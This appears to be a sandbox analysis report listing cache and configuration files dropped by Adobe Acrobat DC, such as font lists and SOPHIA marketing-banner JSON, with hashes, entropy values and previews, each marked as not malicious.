Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7204

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.343939462120271
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJM3g98kUwPeUkwRe9:YvXKXJ4plZc0vOGMbLUkee9
MD5:	8CECCAEF55C0999428EAE5EF015D69D8
SHA1:	54BE5268B56063AD0A1471CAE24FF2B3EBA18BAD
SHA-256:	BB2E2DDC8ADAFF083CAAB3642BACBE94A8B75331B2C72AABA9211B89C6E38092
SHA-512:	C4B0973C059B997E834C705B6C0AEA28F120AF2851E8E0A209128E6E2C098CF4A01657A76E908354E25AED9D0AB02CB802174F9AD9CAE291980943D66BB7EF69
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.293736679882921
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfBoTfXpnrPeUkwRe9:YvXKXJ4plZc0vOGWTfXcUkee9
MD5:	D0F7703349D2F64980B5C90768ADA974
SHA1:	903A1ECA6FCA833D633CE4DD4848E4A146CC768C
SHA-256:	26D6458528B5DAF480D845C7D21E649F2E88360B5F4FD7CF4F18C84A5C0B5544
SHA-512:	F3A56EF0D3E784C15187F854D7957EDD71D63F81F8C7F570940F5A3D5616A0C7F302D14ECB19F86232724289112855A57B7544FDF3FBFD23E0CA9119ED165883
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.272934427852125
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfBD2G6UpnrPeUkwRe9:YvXKXJ4plZc0vOGR22cUkee9
MD5:	AD1A67A48ECC3CA34DAE83C44E78894B
SHA1:	BB01727C4CD984940B2382204CAFF1F254FB8E3B
SHA-256:	D5057AD8B94CB6036604C7440732AEB4DEA37FB1C1C7FA801B168F53CBF5A8BF
SHA-512:	E3E8FF75E62913F056CCF2CB97DF5C6738485EB0B5BA058885BE230B501F92390217693012B142EAEDAC0DBEC8A794A3B1FF95B31987A30F22CF8C7BDF28FA1F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.330268427115539
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfPmwrPeUkwRe9:YvXKXJ4plZc0vOGH56Ukee9
MD5:	588CAB16220CF3385E978CB900A1566F
SHA1:	EC561352B95F9804FF624E887927C421AFD111DB
SHA-256:	09FD52D03490E711F4921008B85C7BB804C4ECEEBEA694CBC4AEF589A6E2EEB9
SHA-512:	F99F517B8D76544B3437FAA603122C0261DF1249F5D2DA4BA63A75CA7954B6CAC5B63317057699B776271346895A2925354374EE3E3EB4CE430C38D8CC19FA85
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.689971463508667
Encrypted:	false
SSDEEP:	24:Yv6XuPzv7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSMI:Yv/7zhgy6SAFv5Ah8cv/MI
MD5:	8C4B41E8F65EEEC88F7E713B0EFE6998
SHA1:	239439F3A7EA2A99DC6D3F6515853991CAE90BF3
SHA-256:	1B5AD43189EC5ACA74A4CDEC01C90230D6B91C9FDDA81F17E20A8C8C48147190
SHA-512:	2FE0E984929E65511E211619724BF5BC6C224F0AE841D92DC16B34D9FFD8A5F8FA1FE76AA2941493F7FCC7BA89AAB4F9D8076E603ACE5261A919E7D1AC5A8170
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.279007381481267
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJf8dPeUkwRe9:YvXKXJ4plZc0vOGU8Ukee9
MD5:	2482BBE79546B16297AEEDA76A5C249D
SHA1:	C812AB4BABFE8FABAB2C764BF0BB19C75D808FE8
SHA-256:	D11BA0880F71CA7ED24E2FD51E676A5D032A8DAEF093D42BAB2CC06426FBBC17
SHA-512:	B9A9C981CBE7F94803D66140176896B4576E10602BD6C2D2D631F598E235A7AC4E17EB5C307E53AAAFBDFC389FE37EEACF45D09D11879007D017CD15F3341290
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.283705293483877
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfQ1rPeUkwRe9:YvXKXJ4plZc0vOGY16Ukee9
MD5:	26BB71F1AD79E73EB08071E382B79AB6
SHA1:	9C3D7A296AE3D6B717A69B9A87492CC147229591
SHA-256:	C690D04F18070EAF7F001A971E719A1F256957E5FF6B8061AA88CCA43C772F4E
SHA-512:	2E2AD6CB02261A2578F4B5C5A62D6042BFE8732FC3991DCCEF35AAB33E69623333092A74BF9439875CE3270FB07822C69A5290635F8E8EE6B355714863B70AC4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.288259781152163
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfFldPeUkwRe9:YvXKXJ4plZc0vOGz8Ukee9
MD5:	565E6FC8CC4DA784A2A74C157B7299AF
SHA1:	CD14880DF3BAD82C8F5004DAE9422CF2A6407883
SHA-256:	CD025E7EB9B736D7A1851616D23759011538B2E637997AAC267F8275729F2F7E
SHA-512:	1A9C9454703D1658B4F318C8C65B73A1A35F1684A77A7D9384BCB67B9F4227A95ED651FFEDDF241702F34282003BF615C2D4E59CE4FB13397563492FEA10A4DA
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.303935120881641
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfzdPeUkwRe9:YvXKXJ4plZc0vOGb8Ukee9
MD5:	55F7C75B97EC763729B59961784E0955
SHA1:	0E2C54BE8C72B365E089A9BDEEAEF2776D4F3696
SHA-256:	B9A6258D3111BF5ECF570E8CE498AE70EF281D24864D7541F6E7467FD8BF3600
SHA-512:	6C1024D3F75AB4CB267488F32E6AADCF253E0F92DC016939B181185329544357FB8A377E5BD3A46E4A6D681668F538EB7AD07533CFA52C0521B879D4647CE7A8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.284536026300792
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfYdPeUkwRe9:YvXKXJ4plZc0vOGg8Ukee9
MD5:	86C072FE11CFEBB980604E19086DB39B
SHA1:	2D363C5C1185A1DE5C93EFFA638A002DF9A496C6
SHA-256:	760A352CC27D1E451D04483D1A7AC35433C87D2AF6BF1E96111607E828D85711
SHA-512:	C4916F337718AC587B4CB915B73488E902CFFCC8E9751212EAF4740FA4B35B32B82DC200469F94C12AD0106133DA678877AD2F85188BF60177E0B0B16125F788
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.27031414606558
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJf+dPeUkwRe9:YvXKXJ4plZc0vOG28Ukee9
MD5:	214FC8A79E8AD0DBD794857FE6B05B52
SHA1:	CB691C2075497041C732C5BCC23D0215EF8594B3
SHA-256:	89AB6A07B6BB44074BD6B20F7CB83E8DDA2044E6566661333D98E974CFFD7398
SHA-512:	46444D4C1448E74A2B378BD8BC495944B83C1F2F72210E5923E358A28106D223957522262A9B6B16118A1C15A0F119195ECB2D0B53F0E18EECFDD270D74F837A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.268189405580835
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfbPtdPeUkwRe9:YvXKXJ4plZc0vOGDV8Ukee9
MD5:	C3CAB59230DDB623DDD50B88A767FC87
SHA1:	59E42CBB41A93AFBE0CE51738904D6ABDDE17510
SHA-256:	4F229EEEB8F4A56748E77606F038046A69CA25D0BABE6179246937B64F30A908
SHA-512:	3C9CA6E8737C25FB4EA6117D0F775B835D42C20F5D42B4FBE43D60CA29AC8FD1757B5DCB7B45C95FAD5DF2CAE46F362077244FCBD9AE8F1999B56F87AAB7DB0F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.272922679314893
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJf21rPeUkwRe9:YvXKXJ4plZc0vOG+16Ukee9
MD5:	CEF632818F4CF24C5E3957EDF82A4BBA
SHA1:	17C3B55B262FF203267B5DEBBF598A3637854C5D
SHA-256:	D4E35A6BCBFE6DC69352669B9609AACC896B2A74D448B9148FC02ACF3D313023
SHA-512:	10A373F608F7025D22E4339B05136C10CC9C9810BEF94FD81C2B8CE80E15916F318B4D6B74DA5FFBE2B903A0BF6A73A3EB09F3C4683B684F75F421F570F0677C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.666278647783072
Encrypted:	false
SSDEEP:	24:Yv6XuPzv7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSMI:Yv/7zBgkDMUJUAh8cvMMI
MD5:	A6F3E9BF2C0F03DF107459550A8B06FD
SHA1:	C9F8B42397B9CF7BF3E668C04DF4947B50FF1C29
SHA-256:	04E7F8BB12552F600E3269E30B43565F447697AC58B32C206D8EE523304E32FE
SHA-512:	7D436B1171B088C4CD2E85FE710C394AC564A8539CD505E419B31E45F3E0BD7F96CA77779AEDAF25087172D19568E3AC3963937B0F723CCAA759DE9DC358B748
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.248932526475691
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJfshHHrPeUkwRe9:YvXKXJ4plZc0vOGUUUkee9
MD5:	2D9185961DF470CACFA01795F6309932
SHA1:	BFE68492851505C5E52EBBE62400572C4D5160B3
SHA-256:	B8634A81E90B24263E80774254B6B5D8BEB9F69FA5220EA3C9720FC03D14B642
SHA-512:	4F9D66F048DCBFA09DFA020DF4FBE6E793B35AE75F9DA2050FEA6A861683870913E4FC3AF610522B46696CDD665C3E3A5AA066701AB71943FC42214CE360CCEF
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.256000088610491
Encrypted:	false
SSDEEP:	6:YEQXJ2HX4E4QKpO9VoZcg1vRcR0YTeoAvJTqgFCrPeUkwRe9:YvXKXJ4plZc0vOGTq16Ukee9
MD5:	3476FD5F4D67B359DAFF5AFA4F452829
SHA1:	A3AC3BA33C4A4E80B2B0D566268E711F5FA839EC
SHA-256:	77F216F136AB188DF8FABAAC753AC844A44111D90FC4FF9AFD6BF71CE6D0DF7F
SHA-512:	C0233FB64789CE4A60FFD490AEAE6AB7B267866DF8020403E4B3AE7BA415703EA90A346A4B41A4BE6B099F3DA7B28E7CEC2FE7345369E4DCB09B41157924467D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"7a72ba14-09d5-41eb-b7a9-204ff73f47b9","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736404479372,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.136401617770315
Encrypted:	false
SSDEEP:	48:YvgU7dYdwpfdZcdZL0dSBdfdBqrdryed8hdShNP4dhTf7dJESdH0dEwSV9adAndn:GB4MlZkZLsS7lBqpry68b+QRBJE2HsjQ
MD5:	A82E77D816A05ED028F58EE9BF3A12B9
SHA1:	C62EB553D1391248C6F859B0A3FE82BB1493F961
SHA-256:	771C6C1E8BA280AD3D9E78A32DDF3C49CA076DD4759442E0157F63366A285EC1
SHA-512:	4F461D0AC242A144811A1FE7603D540F270A47B43467DCE9B8709A1E230E12486E7C21DC48B4BA4B2C6148AD676111957671F3DB4445EBD42A974596F6ED1FED
Malicious:	false
